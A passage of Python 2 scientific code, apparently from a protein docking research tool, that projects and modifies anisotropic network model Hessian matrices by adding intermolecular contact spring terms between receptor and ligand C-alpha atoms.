# writePDB("complex_before_Ptimes.pdb", proteinComplex_ca)
# coord_shape = proteinComplex_ca.getCoords().shape
# coords_P = P.dot(proteinComplex_ca.getCoords().flatten())
# coords_P = coords_P.reshape(coord_shape)
# proteinComplex_ca.setCoords(coords_P)
# writePDB("complex_after_Ptimes"+projectionStyle+".pdb", proteinComplex_ca)
raw_input()
###
# Q, R = np.linalg.qr(P, mode="complete")
# print "independent columns Q: ", self.utils.independent_columns(Q).shape
# print "matrix rank Q: ", self.utils.matrixrank(Q)
# print "matrix np rank Q: ", np.linalg.matrix_rank(Q)," ", np.linalg.matrix_rank(np.matrix(Q))
# print "log of determinant of Q: ", np.linalg.slogdet(Q)
### corres Q = I - Q
#P = I-Q
# Apply PH'H, np.dot is matrix multiplication for 2D arrays
#print "count orthogonal columns: ", self.utils.countOrthogonalColumns(I-P)
Hprime = np.dot(P.T, hessian)
Hprime = np.dot(Hprime, P)
# Return the projected hessian
#print "after projection symmetry ==, allclose: ", np.all(Hprime-Hprime.T==0), np.allclose(Hprime, Hprime.T)
#print "H: ", hessian
#print "Hprime: ", Hprime
return Hprime
def transformHessianToFixedDomainFrame(self, hessian, reference, proteinComplex, referenceSegment, projectionStyle):
""" Application of formula 20 from:
Fuchigami, Sotaro, Satoshi Omori, Mitsunori Ikeguchi, and Akinori Kidera.
"Normal Mode Analysis of Protein Dynamics in a Non-Eckart Frame."
The Journal of Chemical Physics 132, no. 10 (March 11, 2010): 104109. doi:10.1063/1.3352566.
"""
numAtoms = reference.select('calpha').numAtoms()
numCoords = numAtoms*3
centerOfCoords = calcCenter(reference.select('calpha'))
#assert np.alltrue(centerOfCoords == calcCenter(proteinComplex.select('segment \"'+referenceSegment+'.\"').select('calpha')))
numComplexAtoms = proteinComplex.select('calpha').numAtoms()
numComplexCoords = numComplexAtoms*3
numCounterpartCoords = numComplexCoords - numCoords
if referenceSegment == "R":
# create the P matrix, receptor is fixed domain
P = np.zeros((numComplexCoords, numComplexCoords))
P[:numCoords, :numCoords] = np.identity(numCoords)
assert numCounterpartCoords == proteinComplex.select('segment \"L.\"').select('calpha').numAtoms() * 3
else:
# create the P matrix, ligand is fixed domain
P = np.zeros((numComplexCoords, numComplexCoords))
numCoords_receptor = proteinComplex.select('segment \"R.\"').select('calpha').numAtoms() * 3
P[numCoords_receptor:, numCoords_receptor:] = np.identity(proteinComplex.select('segment \"L.\"').select('calpha').numAtoms() * 3)
assert numCounterpartCoords == proteinComplex.select('segment \"R.\"').select('calpha').numAtoms() * 3
# create rigid body motion eigenvectors out_values
out_vals, out_vectors = sp.linalg.eigh(hessian)
# sort the eigenvalues and eigenvectors ascendingly, this is not asserted by the eigh return, see
# http://stackoverflow.com/questions/8092920/sort-eigenvalues-and-associated-eigenvectors-after-using-numpy-linalg-eig-in-pyt
idx = out_vals.argsort()
out_vals = out_vals[idx]
out_vectors = out_vectors[:,idx]
# take the first six eigenvalues and eigenvectors
out_vals = out_vals[:6]
out_vectors = out_vectors.T[:6].T
#print "P.shape: ", P.shape
#print "out_vectors.shape: ", out_vectors.shape
# create the transformation matrix
inv = (out_vectors.T.dot(P)).dot(out_vectors)
inv = np.linalg.inv(inv)
secondTerm = ((out_vectors.dot(inv)).dot(out_vectors.T)).dot(P)
U = np.identity(numComplexCoords) - secondTerm
print "calculated transformation matrix U"
#writeArray("hessianbeforeU.txt", hessian, format='%10.7f')
Hprime = np.dot(U, hessian)
Hprime = np.dot(Hprime, U.T)
#writeArray(proteinComplex.getTitle()+"U.txt", U, format='%10.7f')
#writeArray("hessianafterU.txt", Hprime, format='%10.7f')
print "obtained Hprime with a fixed domain frame"
return Hprime
def subtractCenterOfCoords(self, vector, xElement, yElement, zElement):
""" Subtract from a vector having a [i][3] dim array elementwise the center of coords and return the result. """
coordsNx3 = vector.getArrayNx3()
subtractArray = np.array([xElement, yElement, zElement])
coordsNx3 = coordsNx3 - subtractArray
resultVector = Vector(coordsNx3.flatten())
return resultVector
def addscaledHdelta(self, HR, HRtilde, deltaHRmultiplicator):
assert HR.shape == HRtilde.shape
deltaHR = HRtilde - HR
deltaHR = deltaHR * deltaHRmultiplicator
return (HR + deltaHR)
def calcCustomH_ANew(self, HR, referenceStructure, neighborStructure, encounter, neighborhoodFrom, equilibriumAt, workOnReceptor=True, selstr='calpha'):
""" Modifies the hessian HR or HL by adding additonal terms for intramolecular contacts.
Args:
HR: The original HR as calculated by prody
referenceStructure: structure to take calphas from, the hessian HR belongs to it or to its superset if I is a chain
neighborStructure: structure to apply the neighborhood calculations on
encounter: object with all encounter information
neighborhoodFrom: is the neighborhood calculated from the unbound complex C_u or the bound complex C_b
equilibriumAt: is the equilibrium set to r_ij or r_ij_b
workonReceptor: is the Hessian and the referenceStructure receptor or ligand
selstr: atomType of the course grained ANM (by default calpha)
"""
assert equilibriumAt == "r_ij" or equilibriumAt == "r_ij_b"
assert neighborhoodFrom == "C_u" or neighborhoodFrom == "C_b"
if workOnReceptor:
reference = encounter.getReference()
if self.bound_provided == True:
refchain = encounter.getRefChain()
mobile = encounter.getMobile()
mobChain = encounter.getMobChain()
boundCounterpart = encounter.getBoundCounterpart()
boundCounterpartChain = encounter.getBoundCounterpartChain()
unboundCounterpartChain = encounter.getUnboundCounterpartChain()
else:
reference = encounter.getUnboundCounterpart()
if self.bound_provided == True:
refchain = encounter.getUnboundCounterpartChain()
mobile = encounter.getBoundCounterpart()
mobChain = encounter.getBoundCounterpartChain()
boundCounterpart = encounter.getMobile()
boundCounterpartChain = encounter.getMobChain()
unboundCounterpartChain = encounter.getRefChain()
neighborStructureCalpha = neighborStructure.select('calpha')
contactsCounter = 0
interCalphaIndices = []
for idx, element in enumerate(referenceStructure.select('calpha')):
contactsOfI = encounter.getIntermolecularNeighborsOfAtom(element, neighborStructure, selstr, str(self.utils.config.customHRdistance))
# if element has contacts in the neighborStructure, the hessian needs an update in the 3*3 matrix on the diagonal of this element atom
if contactsOfI:
contactsCounter += contactsOfI.numAtoms()
interCalphaIndices.append(idx)
print "intermolecular contacts: ", contactsOfI.numAtoms()
contacts_counterpartChainIndices = self.utils.getMatchingStructureSelections(neighborStructureCalpha, contactsOfI, neighborStructureCalpha)
assert len(contactsOfI) == len(contacts_counterpartChainIndices)
# access each element contact to create the deltaTerm
overallTerm = np.zeros((3,3))
for elementcontact, contacts_counterpartChainIndex in zip(contactsOfI, contacts_counterpartChainIndices):
if neighborhoodFrom == "C_u":
r_ij = calcDistance(element, elementcontact)
if equilibriumAt == "r_ij":
r_ij_b = r_ij
#if element is not in matched reference or contact is not in matched counterpart: r_ij_b = r_ij
elif not(element in refchain.select('calpha')) or not(elementcontact in unboundCounterpartChain.select('calpha')):
r_ij_b = r_ij
else:
elementPositionInChain = encounter.accessANMs().getCalphaPosition(element, refchain.select('calpha'))
contactPositionInChain = encounter.accessANMs().getCalphaPosition(elementcontact, unboundCounterpartChain.select('calpha'))
r_ij_b = calcDistance(mobChain.select('calpha')[elementPositionInChain], boundCounterpartChain.select('calpha')[contactPositionInChain])
self.utils.assertTwoAtomsAreEqual(mobChain.select('calpha')[elementPositionInChain], element, useCoords=False, useResname=True)
self.utils.assertTwoAtomsAreEqual(refchain.select('calpha')[elementPositionInChain], element, useCoords=False, useResname=True)
self.utils.assertTwoAtomsAreEqual(boundCounterpartChain.select('calpha')[contactPositionInChain], elementcontact, useCoords=False, useResname=True)
self.utils.assertTwoAtomsAreEqual(unboundCounterpartChain.select('calpha')[contactPositionInChain], elementcontact, useCoords=False, useResname=True)
# make the 3*3 hessian term for this contact (excluding gamma, gamma is multiplied at the end to the sum)
deltaTerm = self.make3By3HessianTerm(element, elementcontact, r_ij, r_ij_b)
#print element, elementcontact, " r_ij, rij_b: ", r_ij, r_ij_b
overallTerm += deltaTerm
else:
if equilibriumAt == "r_ij_b":
r_ij_b = calcDistance(element, elementcontact)
elementPositionInChain = encounter.accessANMs().getCalphaPosition(element, mobChain.select('calpha'))
contactPositionInChain = encounter.accessANMs().getCalphaPosition(elementcontact, boundCounterpartChain.select('calpha'))
r_ij = calcDistance(refchain.select('calpha')[elementPositionInChain], unboundCounterpartChain.select('calpha')[contactPositionInChain])
self.utils.assertTwoAtomsAreEqual(mobChain.select('calpha')[elementPositionInChain], element, useCoords=False, useResname=True)
self.utils.assertTwoAtomsAreEqual(refchain.select('calpha')[elementPositionInChain], element, useCoords=False, useResname=True)
self.utils.assertTwoAtomsAreEqual(boundCounterpartChain.select('calpha')[contactPositionInChain], elementcontact, useCoords=False, useResname=True)
self.utils.assertTwoAtomsAreEqual(unboundCounterpartChain.select('calpha')[contactPositionInChain], elementcontact, useCoords=False, useResname=True)
else:
elementPositionInChain = encounter.accessANMs().getCalphaPosition(element, mobChain.select('calpha'))
contactPositionInChain = encounter.accessANMs().getCalphaPosition(elementcontact, boundCounterpartChain.select('calpha'))
r_ij = calcDistance(refchain.select('calpha')[elementPositionInChain], unboundCounterpartChain.select('calpha')[contactPositionInChain])
r_ij_b = r_ij
self.utils.assertTwoAtomsAreEqual(mobChain.select('calpha')[elementPositionInChain], element, useCoords=False, useResname=True)
self.utils.assertTwoAtomsAreEqual(refchain.select('calpha')[elementPositionInChain], element, useCoords=False, useResname=True)
self.utils.assertTwoAtomsAreEqual(boundCounterpartChain.select('calpha')[contactPositionInChain], elementcontact, useCoords=False, useResname=True)
self.utils.assertTwoAtomsAreEqual(unboundCounterpartChain.select('calpha')[contactPositionInChain], elementcontact, useCoords=False, useResname=True)
# make the 3*3 hessian term for this contact (excluding gamma, gamma is multiplied at the end to the sum)
deltaTerm = self.make3By3HessianTerm(refchain.select('calpha')[elementPositionInChain], unboundCounterpartChain.select('calpha')[contactPositionInChain], r_ij, r_ij_b)
#print refchain.select('calpha')[elementPositionInChain], unboundCounterpartChain.select('calpha')[contactPositionInChain], " r_ij, rij_b: ", r_ij, r_ij_b
overallTerm += deltaTerm
# multiply the overallTerm with the spring constant gamma
overallTerm = overallTerm * self.utils.config.customForceConstant
# add the overallterm to the hessian matrix
if neighborhoodFrom == "C_b":
elementPosition = encounter.accessANMs().getCalphaPosition(refchain.select('calpha')[elementPositionInChain], reference.select('calpha'))
else:
elementPosition = encounter.accessANMs().getCalphaPosition(element, reference.select('calpha'))
HR = self.add3By3MatrixtoHessian(overallTerm, HR, elementPosition*3)
print "added custom terms to hessian"
print "total intermolecular contacts: ", contactsCounter
return HR, interCalphaIndices
def calcCustomH_ANew_IJ(self, referenceStructure, neighborStructure, encounter, areStructuresChains, equilibriumAt, workOnReceptor=True, selstr='calpha'):
""" Creates the HRL matrix made through intramolecular contacts.
Args:
referenceStructure: structure to take calphas from, the hessian HR belongs to it or to its superset if I is a chain
neighborStructure: structure to apply the neighborhood calculations on
encounter: object with all encounter information
areStructuresChains: boolean to describe if the structures are chains (subsets)
equilibriumAt: is the equilibrium set to r_ij or r_ij_b
workonReceptor: is the Hessian and the referenceStructure receptor or ligand
selstr: atomType of the course grained ANM (by default calpha)
"""
assert equilibriumAt == "r_ij" or equilibriumAt == "r_ij_b"
if workOnReceptor:
if areStructuresChains:
if self.bound_provided == True:
mobile = encounter.getMobChain()
boundCounterpart = encounter.getBoundCounterpartChain()
else:
pass
else:
reference = encounter.getReference()
unboundCounterpart = encounter.getUnboundCounterpart()
if self.bound_provided == True:
refchain = encounter.getRefChain()
mobile = encounter.getMobile()
mobChain = encounter.getMobChain()
boundCounterpart = encounter.getBoundCounterpart()
boundCounterpartChain = encounter.getBoundCounterpartChain()
unboundCounterpartChain = encounter.getUnboundCounterpartChain()
else:
if areStructuresChains:
if self.bound_provided == True:
mobile = encounter.getBoundCounterpartChain()
boundCounterpart = encounter.getMobChain()
else:
pass
else:
reference = encounter.getUnboundCounterpart()
unboundCounterpart = encounter.getReference()
if self.bound_provided == True:
refchain = encounter.getUnboundCounterpartChain()
mobile = encounter.getBoundCounterpart()
mobChain = encounter.getBoundCounterpartChain()
boundCounterpart = encounter.getMobile()
boundCounterpartChain = encounter.getMobChain()
unboundCounterpartChain = encounter.getRefChain()
neighborStructureCalpha = neighborStructure.select('calpha')
offDiagonalHessianMatrix = np.zeros(((reference.select('calpha').numAtoms()*3), (unboundCounterpart.select('calpha').numAtoms()*3) ))
contactsCounter = 0
for idx, element in enumerate(referenceStructure.select('calpha')):
contactsOfI = encounter.getIntermolecularNeighborsOfAtom(element, neighborStructure, selstr, str(self.utils.config.customHRdistance))
# if element has contacts in the neighborStructure, the hessian needs an update in the 3*3 matrix on the diagonal of this element atom
if contactsOfI:
print "intermolecular contacts: ", contactsOfI.numAtoms()
contactsCounter += contactsOfI.numAtoms()
# print "contact at i, refChainCalphas[i]: ", i, refChainCalphas[i]
contacts_counterpartChainIndices = self.utils.getMatchingStructureSelections(neighborStructureCalpha, contactsOfI, neighborStructureCalpha)
assert len(contactsOfI) == len(contacts_counterpartChainIndices)
# access each element contact to create the deltaTerm
for elementcontact, contacts_counterpartChainIndex in zip(contactsOfI, contacts_counterpartChainIndices):
overallTerm = np.zeros((3,3))
#self.utils.assertTwoAtomsAreEqual(refChainCalphas[i], mobChainCalphas[i], useCoords=False, useResname=True)
#self.utils.assertTwoAtomsAreEqual(elementcontact, boundCounterpartChainCalphas[contacts_counterpartChainIndex], useCoords=False, useResname=True)
r_ij = calcDistance(element, elementcontact)
if equilibriumAt == "r_ij":
r_ij_b = r_ij
#if element is not in matched reference or contact is not in matched counterpart: r_ij_b = r_ij
elif not(element in refchain.select('calpha')) or not(elementcontact in unboundCounterpartChain.select('calpha')):
r_ij_b = r_ij
else:
elementPositionInChain = encounter.accessANMs().getCalphaPosition(element, refchain.select('calpha'))
contactPositionInChain = encounter.accessANMs().getCalphaPosition(elementcontact, unboundCounterpartChain.select('calpha'))
r_ij_b = calcDistance(mobChain.select('calpha')[elementPositionInChain], boundCounterpartChain.select('calpha')[contactPositionInChain])
self.utils.assertTwoAtomsAreEqual(mobChain.select('calpha')[elementPositionInChain], element, useCoords=False, useResname=True)
self.utils.assertTwoAtomsAreEqual(refchain.select('calpha')[elementPositionInChain], element, useCoords=False, useResname=True)
self.utils.assertTwoAtomsAreEqual(boundCounterpartChain.select('calpha')[contactPositionInChain], elementcontact, useCoords=False, useResname=True)
self.utils.assertTwoAtomsAreEqual(unboundCounterpartChain.select('calpha')[contactPositionInChain], elementcontact, useCoords=False, useResname=True)
#
# make the 3*3 hessian term for this contact (excluding gamma, gamma is multiplied at the end to the sum)
deltaTerm = self.make3By3OffDiagonalHessianTermIJ(element, elementcontact, r_ij, r_ij_b)
overallTerm += deltaTerm
#print "r_ij, r_ij_b: ", r_ij, r_ij_b
# multiply the overallTerm with the spring constant gamma
overallTerm = overallTerm * self.utils.config.customForceConstant
# print overallTerm
offDiagonalHessianMatrix = self.add3By3MatrixtoOffDiagonalHessianMatrixIJ(overallTerm, offDiagonalHessianMatrix, idx*3, contacts_counterpartChainIndex*3)
#print contactsOfI.numAtoms(), "neighbors, modifying at hessian (loopcounter*3)+1: ", str((loopCounter*3)+1)
#print str(i)+"'th refchain calpha, hessian line number ", (loopCounter*3)+1, "contacts with ", unboundCounterpartChainCalphas[contacts_counterpartChainIndex], " unboundcounterpartchainindex: ", contacts_counterpartChainIndices
#print ""
# add the overallterm to the hessian matrix
###elementPosition = encounter.accessANMs().getCalphaPosition(element, encounter.getReference().select('calpha'))
print "added custom terms to offDiagonalHessianMatrix"
print "total intermolecular contacts: ", contactsCounter
return offDiagonalHessianMatrix
def calcCustomH_ANew_U1(self, HR, referenceStructure, neighborStructure, encounter, areStructuresChains, equilibriumAt, workOnReceptor=True, selstr='calpha'):
""" Modifies the hessian HR or HL by adding additonal terms for intramolecular contacts.
Args:
HR: The original HR as calculated by prody
referenceStructure: structure to take calphas from, the hessian HR belongs to it or to its superset if I is a chain
neighborStructure: structure to apply the neighborhood calculations on
encounter: object with all encounter information
areStructuresChains: boolean to describe if the structures are chains (subsets)
equilibriumAt: is the equilibrium set to r_ij or r_ij_b
workonReceptor: is the Hessian and the referenceStructure receptor or ligand
selstr: atomType of the course grained ANM (by default calpha)
"""
assert equilibriumAt == "r_ij" or equilibriumAt == "r_ij_b"
if workOnReceptor:
refchain = encounter.getRefChain()
mobile = encounter.getMobile()
mobChain = encounter.getMobChain()
boundCounterpart = encounter.getBoundCounterpart()
boundCounterpartChain = encounter.getBoundCounterpartChain()
unboundCounterpartChain = encounter.getUnboundCounterpartChain()
else:
refchain = encounter.getUnboundCounterpartChain()
mobile = encounter.getBoundCounterpart()
mobChain = encounter.getBoundCounterpartChain()
boundCounterpart = encounter.getMobile()
boundCounterpartChain = encounter.getMobChain()
unboundCounterpartChain = encounter.getRefChain()
neighborStructureCalpha = neighborStructure.select('calpha')
for idx, element in enumerate(referenceStructure.select('calpha')):
contactsOfI = encounter.getIntermolecularNeighborsOfAtom(element, neighborStructure, selstr, str(self.utils.config.customHRdistance))
# if element has contacts in the neighborStructure, the hessian needs an update in the 3*3 matrix on the diagonal of this element atom
if contactsOfI:
# print "contact at i, refChainCalphas[i]: ", i, refChainCalphas[i]
contacts_counterpartChainIndices = self.utils.getMatchingStructureSelections(neighborStructureCalpha, contactsOfI, neighborStructureCalpha)
assert len(contactsOfI) == len(contacts_counterpartChainIndices)
# access each element contact to create the deltaTerm
overallTerm = np.zeros((3,3))
for elementcontact, contacts_counterpartChainIndex in zip(contactsOfI, contacts_counterpartChainIndices):
#self.utils.assertTwoAtomsAreEqual(refChainCalphas[i], mobChainCalphas[i], useCoords=False, useResname=True)
#self.utils.assertTwoAtomsAreEqual(elementcontact, boundCounterpartChainCalphas[contacts_counterpartChainIndex], useCoords=False, useResname=True)
if equilibriumAt == "r_ij_b":
r_ij_b = calcDistance(element, elementcontact)
elementPositionInChain = encounter.accessANMs().getCalphaPosition(element, mobChain.select('calpha'))
contactPositionInChain = encounter.accessANMs().getCalphaPosition(elementcontact, boundCounterpartChain.select('calpha'))
r_ij = calcDistance(refchain.select('calpha')[elementPositionInChain], unboundCounterpartChain.select('calpha')[contactPositionInChain])
self.utils.assertTwoAtomsAreEqual(mobChain.select('calpha')[elementPositionInChain], element, useCoords=False, useResname=True)
self.utils.assertTwoAtomsAreEqual(refchain.select('calpha')[elementPositionInChain], element, useCoords=False, useResname=True)
self.utils.assertTwoAtomsAreEqual(boundCounterpartChain.select('calpha')[contactPositionInChain], elementcontact, useCoords=False, useResname=True)
self.utils.assertTwoAtomsAreEqual(unboundCounterpartChain.select('calpha')[contactPositionInChain], elementcontact, useCoords=False, useResname=True)
else:
elementPositionInChain = encounter.accessANMs().getCalphaPosition(element, mobChain.select('calpha'))
contactPositionInChain = encounter.accessANMs().getCalphaPosition(elementcontact, boundCounterpartChain.select('calpha'))
r_ij = calcDistance(refchain.select('calpha')[elementPositionInChain], unboundCounterpartChain.select('calpha')[contactPositionInChain])
r_ij_b = r_ij
self.utils.assertTwoAtomsAreEqual(mobChain.select('calpha')[elementPositionInChain], element, useCoords=False, useResname=True)
self.utils.assertTwoAtomsAreEqual(refchain.select('calpha')[elementPositionInChain], element, useCoords=False, useResname=True)
self.utils.assertTwoAtomsAreEqual(boundCounterpartChain.select('calpha')[contactPositionInChain], elementcontact, useCoords=False, useResname=True)
self.utils.assertTwoAtomsAreEqual(unboundCounterpartChain.select('calpha')[contactPositionInChain], elementcontact, useCoords=False, useResname=True)
#r_ij_b = calcDistance(zip(mobile.select('calpha'))[idx][0], zip(boundCounterpart.select('calpha'))[contacts_counterpartChainIndex][0])
# make the 3*3 hessian term for this contact (excluding gamma, gamma is multiplied at the end to the sum)
deltaTerm = self.make3By3HessianTerm(refchain.select('calpha')[elementPositionInChain], unboundCounterpartChain.select('calpha')[contactPositionInChain], r_ij, r_ij_b)
print refchain.select('calpha')[elementPositionInChain], unboundCounterpartChain.select('calpha')[contactPositionInChain], " r_ij, rij_b: ", r_ij, r_ij_b
overallTerm += deltaTerm
#print "r_ij, r_ij_b: ", r_ij, r_ij_b
# multiply the overallTerm with the spring constant gamma
overallTerm = overallTerm * self.utils.config.customForceConstant
# print overallTerm
#print contactsOfI.numAtoms(), "neighbors, modifying at hessian (loopcounter*3)+1: ", str((loopCounter*3)+1)
#print str(i)+"'th refchain calpha, hessian line number ", (loopCounter*3)+1, "contacts with ", unboundCounterpartChainCalphas[contacts_counterpartChainIndex], " unboundcounterpartchainindex: ", contacts_counterpartChainIndices
#print ""
# add the overallterm to the hessian matrix
elementPosition = encounter.accessANMs().getCalphaPosition(refchain.select('calpha')[elementPositionInChain], encounter.getReference().select('calpha'))
HR = self.add3By3MatrixtoHessian(overallTerm, HR, elementPosition*3)
print "adding to hessian at: ", (elementPosition*3+1)
print "added custom terms to hessian"
return HR
def calcCustomH_A(self, HR, encounter, workOnReceptor=True, selstr='calpha'):
""" Modifies the hessian of anm_reference according to calcCustomH_A and returns it. """
if workOnReceptor:
refChainCalphas = encounter.getRefChain().select('calpha')
mobChainCalphas = encounter.getMobChain().select('calpha')
mobChain = encounter.getMobChain()
refChain = encounter.getRefChain()
boundCounterpartChainCalphas = encounter.getBoundCounterpartChain().select('calpha')
boundCounterpartChain = encounter.getBoundCounterpartChain()
unboundCounterpartChain = encounter.getUnboundCounterpartChain()
unboundCounterpartChainCalphas = encounter.getUnboundCounterpartChain().select('calpha')
referenceCalphas = encounter.getReference().select('calpha')
else:
refChainCalphas = encounter.getUnboundCounterpartChain().select('calpha')
mobChainCalphas = encounter.getBoundCounterpartChain().select('calpha')
mobChain = encounter.getBoundCounterpartChain()
refChain = encounter.getUnboundCounterpartChain()
boundCounterpartChainCalphas = encounter.getMobChain().select('calpha')
boundCounterpartChain = encounter.getMobChain()
unboundCounterpartChain = encounter.getRefChain()
unboundCounterpartChainCalphas = encounter.getRefChain().select('calpha')
referenceCalphas = encounter.getUnboundCounterpart().select('calpha')
#encounter.printIntermolecularNeighbors(encounter.getReference(), encounter.getUnboundCounterpart(), selstr, str(self.utils.config.customHRdistance))
# Loop over all calphas in the reference structure (using matched chains)
counterUnmatchedCalphas = 0
loopCounter = 0
for element in referenceCalphas:
i = loopCounter - counterUnmatchedCalphas
if self.utils.doesAtomExistInY(element, refChainCalphas) is None:
counterUnmatchedCalphas += 1
loopCounter += 1
continue
else:
contactsOfI = encounter.getIntermolecularNeighbors(refChain, unboundCounterpartChain, i, selstr, str(self.utils.config.customHRdistance))
# if there are contacts in the unbound counterpart, the hessian needs an update in the 3*3 matrix of the diagonal of this atom
if contactsOfI:
# print "contact at i, refChainCalphas[i]: ", i, refChainCalphas[i]
contacts_counterpartChainIndices = self.utils.getMatchingStructure(unboundCounterpartChainCalphas, contactsOfI, boundCounterpartChainCalphas)
assert len(contactsOfI) == len(contacts_counterpartChainIndices)
# access each element contact to create the deltaTerm
overallTerm = np.zeros((3,3))
for elementcontact, contacts_counterpartChainIndex in zip(contactsOfI, contacts_counterpartChainIndices):
self.utils.assertTwoAtomsAreEqual(refChainCalphas[i], mobChainCalphas[i], useCoords=False, useResname=True)
self.utils.assertTwoAtomsAreEqual(elementcontact, boundCounterpartChainCalphas[contacts_counterpartChainIndex], useCoords=False, useResname=True)
r_ij = calcDistance(refChainCalphas[i], elementcontact)
r_ij_b = calcDistance(mobChainCalphas[i], boundCounterpartChainCalphas[contacts_counterpartChainIndex])
# make the 3*3 hessian term for this contact (excluding gamma, gamma is multiplied at the end to the sum)
deltaTerm = self.make3By3HessianTerm(refChainCalphas[i], elementcontact, r_ij, r_ij_b)
overallTerm += deltaTerm
#print "r_ij, r_ij_b: ", r_ij, r_ij_b
# multiply the overallTerm with the spring constant gamma
overallTerm = overallTerm * self.utils.config.customForceConstant
# print overallTerm
#print contactsOfI.numAtoms(), "neighbors, modifying at hessian (loopcounter*3)+1: ", str((loopCounter*3)+1)
print str(i)+"'th refchain calpha, hessian line number ", (loopCounter*3)+1, "contacts with ", unboundCounterpartChainCalphas[contacts_counterpartChainIndex], " unboundcounterpartchainindex: ", contacts_counterpartChainIndices
print ""
# add the overallterm to the hessian matrix
HR = self.add3By3MatrixtoHessian(overallTerm, HR, loopCounter*3)
loopCounter += 1
assert(loopCounter-counterUnmatchedCalphas) == refChainCalphas.numAtoms()
print "added custom terms to hessian"
return HR
def calcCustomH_A_IJ(self, encounter, workOnReceptor=True, selstr='calpha'):
""" Modifies the hessian of anm_reference according to calcCustomH_A and returns it. """
if workOnReceptor:
refChainCalphas = encounter.getRefChain().select('calpha')
mobChainCalphas = encounter.getMobChain().select('calpha')
mobChain = encounter.getMobChain()
refChain = encounter.getRefChain()
boundCounterpartChainCalphas = encounter.getBoundCounterpartChain().select('calpha')
boundCounterpartChain = encounter.getBoundCounterpartChain()
unboundCounterpartChain = encounter.getUnboundCounterpartChain()
unboundCounterpartChainCalphas = encounter.getUnboundCounterpartChain().select('calpha')
referenceCalphas = encounter.getReference().select('calpha')
mobileCalphas = encounter.getMobile().select('calpha')
unboundCounterpart = encounter.getUnboundCounterpart()
unboundCounterpartCalphas = encounter.getUnboundCounterpart().select('calpha')
else:
refChainCalphas = encounter.getUnboundCounterpartChain().select('calpha')
mobChainCalphas = encounter.getBoundCounterpartChain().select('calpha')
mobChain = encounter.getBoundCounterpartChain()
refChain = encounter.getUnboundCounterpartChain()
boundCounterpartChainCalphas = encounter.getMobChain().select('calpha')
boundCounterpartChain = encounter.getMobChain()
unboundCounterpartChain = encounter.getRefChain()
unboundCounterpartChainCalphas = encounter.getRefChain().select('calpha')
referenceCalphas = encounter.getUnboundCounterpart().select('calpha')
mobileCalphas = encounter.getBoundCounterpart().select('calpha')
unboundCounterpart = encounter.getReference()
unboundCounterpartCalphas = encounter.getReference().select('calpha')
offDiagonalHessianMatrix = np.zeros(((referenceCalphas.numAtoms()*3), (unboundCounterpartCalphas.numAtoms()*3) ))
#encounter.printIntermolecularNeighbors(encounter.getReference(), encounter.getUnboundCounterpart(), selstr, str(self.utils.config.customHRdistance))
# Loop over all calphas in the reference structure (using matched chains)
counterUnmatchedCalphas = 0
loopCounter = 0
for element in referenceCalphas:
i = loopCounter - counterUnmatchedCalphas
if self.utils.doesAtomExistInY(element, refChainCalphas) is None:
counterUnmatchedCalphas += 1
loopCounter += 1
continue
else:
contactsOfI = encounter.getIntermolecularNeighbors(refChain, unboundCounterpartChain, i, selstr, str(self.utils.config.customHRdistance))
# if there are contacts in the unbound counterpart, the hessian needs an update in the 3*3 matrix of the diagonal of this atom
if contactsOfI:
# print "contact at i, refChainCalphas[i]: ", i, refChainCalphas[i]
contacts_counterpartChainIndices = self.utils.getMatchingStructure(unboundCounterpartChainCalphas, contactsOfI, boundCounterpartChainCalphas)
assert len(contactsOfI) == len(contacts_counterpartChainIndices)
# access each element contact to create the deltaTerm
for elementcontact, contacts_counterpartChainIndex in zip(contactsOfI, contacts_counterpartChainIndices):
overallTerm = np.zeros((3,3))
self.utils.assertTwoAtomsAreEqual(refChainCalphas[i], mobChainCalphas[i], useCoords=False, useResname=True)
self.utils.assertTwoAtomsAreEqual(elementcontact, boundCounterpartChainCalphas[contacts_counterpartChainIndex], useCoords=False, useResname=True)
r_ij = calcDistance(refChainCalphas[i], elementcontact)
r_ij_b = calcDistance(mobChainCalphas[i], boundCounterpartChainCalphas[contacts_counterpartChainIndex])
# make the 3*3 hessian term for this contact (excluding gamma, gamma is multiplied at the end to the sum)
deltaTerm = self.make3By3OffDiagonalHessianTermIJ(refChainCalphas[i], unboundCounterpartChainCalphas[contacts_counterpartChainIndex], r_ij, r_ij)
overallTerm += deltaTerm
#print "r_ij, r_ij_b: ", r_ij, r_ij_b
# multiply the overallTerm with the spring constant gamma
overallTerm = overallTerm * self.utils.config.customForceConstant
counterPartCalphaPosition = encounter.accessANMs().getCalphaPosition(unboundCounterpartChainCalphas[contacts_counterpartChainIndex], unboundCounterpart)
print "off diagonal i,j "+str(loopCounter*3)+" "+str(counterPartCalphaPosition*3)+ " term: ", overallTerm
offDiagonalHessianMatrix = self.add3By3MatrixtoOffDiagonalHessianMatrixIJ(overallTerm, offDiagonalHessianMatrix, loopCounter*3, counterPartCalphaPosition*3)
#print contactsOfI.numAtoms(), "neighbors, modifying at hessian (loopcounter*3)+1: ", str((loopCounter*3)+1)
print str(i)+"'th refchain calpha, hessian line number ", (loopCounter*3)+1, "contacts with ", unboundCounterpartChainCalphas[contacts_counterpartChainIndex], " unboundcounterpartchainindex: ", contacts_counterpartChainIndices
print ""
loopCounter += 1
assert(loopCounter-counterUnmatchedCalphas) == refChainCalphas.numAtoms()
print "added custom terms to hessian"
return offDiagonalHessianMatrix
def calcCustomH_A_NeighborsBound(self, HR, encounter, selstr='calpha'):
""" Modifies the hessian of anm_reference according to calcCustomH_A and returns it. """
refChainCalphas = encounter.getRefChain().select('calpha')
mobChainCalphas = encounter.getMobChain().select('calpha')
boundCounterpartChainCalphas = encounter.getBoundCounterpartChain().select('calpha')
unboundCounterpartChainCalphas = encounter.getUnboundCounterpartChain().select('calpha')
referenceCalphas = encounter.getReference().select('calpha')
mobileCalphas = encounter.getMobile().select('calpha')
#encounter.printIntermolecularNeighbors(encounter.getMobile(), encounter.getBoundCounterpart(), selstr, str(self.utils.config.customHRdistance))
# Loop over all calphas in the reference structure (using matched chains)
counterUnmatchedCalphas = 0
loopCounter = 0
for element in referenceCalphas:
i = loopCounter - counterUnmatchedCalphas
if self.utils.doesAtomExistInY(element, refChainCalphas) is None:
counterUnmatchedCalphas += 1
loopCounter += 1
continue
else:
contactsOfI = encounter.getIntermolecularNeighbors(encounter.getMobChain(), encounter.getBoundCounterpartChain(), i, selstr, str(self.utils.config.customHRdistance))
# if there are contacts in the unbound counterpart, the hessian needs an update in the 3*3 matrix of the diagonal of this atom
if contactsOfI:
# print "contact at i, refChainCalphas[i]: ", i, refChainCalphas[i]
